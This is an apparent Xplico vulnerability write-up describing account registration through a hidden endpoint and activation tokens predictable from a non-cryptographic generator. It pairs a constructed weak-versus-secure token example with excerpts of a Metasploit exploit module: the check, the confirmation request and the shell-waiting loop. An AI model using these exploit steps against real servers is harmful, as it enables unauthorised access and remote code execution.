The specific flaw exists within Xplico, which listens on TCP port 9876 by default. Xplico's purpose is to extract the application data contained in an internet traffic capture. There is a hidden endpoint inside Xplico that allows anyone to create a new user. Once a user has been created through the /users/register endpoint, the account must be activated via an activation e-mail: after registration, Xplico tries to send an e-mail containing the activation code. On most installations this e-mail will probably never reach the given address. However, because the activation token is produced by an insecure (non-cryptographic) random string generator, it is possible to compute exactly the same token value.
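As an added illustration of the activation-token weakness described above (constructed for this page; it is neither Xplico's own code nor the Metasploit module's), here is a token generator seeded from the registration timestamp beside a hardened generator backed by the OS CSPRNG, with a check a defender can run to confirm that a generator does not reproduce tokens for a given seed.

```ruby
require 'securerandom'
require 'digest'

ALPHABET = [*'a'..'z', *'0'..'9'].freeze

# Constructed illustration of the weak pattern (not Xplico's code): the token
# comes from a PRNG seeded with the registration timestamp, so the same
# second of registration always yields the identical token.
def weak_activation_token(registered_at, length = 32)
  prng = Random.new(registered_at.to_i)
  Array.new(length) { ALPHABET[prng.rand(ALPHABET.size)] }.join
end

# Hardened form: the token is drawn from the OS CSPRNG and does not depend on
# any observable input such as time or a user id.
def secure_activation_token(length = 32)
  SecureRandom.hex(length / 2)
end

# Store only the digest of the token; a database read then reveals nothing
# that can be pasted into the confirmation URL.
def token_digest(token)
  Digest::SHA256.hexdigest(token)
end

# Defender-side check: a generator that yields the same token twice for the
# same seed is predictable and must not gate account activation.
def seed_dependent?(generator, seed)
  generator.call(seed) == generator.call(seed)
end
```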

```ruby
def check
  # There is no exact way to confirm the vulnerability without registering a new user
  # and triggering the command injection, which is not something we want to do for a check.
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'users', 'register')
  )

  if res && res.code == 302
    Exploit::CheckCode::Safe
  else
    Exploit::CheckCode::Unknown
  end
end
```

```ruby
# We need to follow redirections: even once we have found em_key,
# the server redirects us to the login form, and the confirmation
# that registration completed only appears on the final page.
res = send_request_cgi!(
  'method' => 'GET',
  'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key),
  'cookie' => @cookie
)
```

```ruby
# We cannot wait all day for a session, so we check the status of the
# decoding process up to 5 times, sleeping 1 second on each loop.
is_job_done = nil
counter = 0
until session_created? || !is_job_done.nil? || counter == 5
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
    'cookie' => @cookie
  )

  if res && res.body.include?('File uploaded, wait start decoding...')
    print_status('Parsing has started. Wait for parser to get the job done...')
  end

  if res && res.body.include?('DECODING')
    print_good('We are at PCAP decoding phase. Little bit more patience...')
  end

  # The decoding process will not finish as long as we hold the msf session,
  # so this case is never reached when exploitation succeeds.
  if res && res.body.include?('DECODING COMPLETED')
    print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
    is_job_done = 1
    next
  end

  sleep(1)
  counter += 1
end
```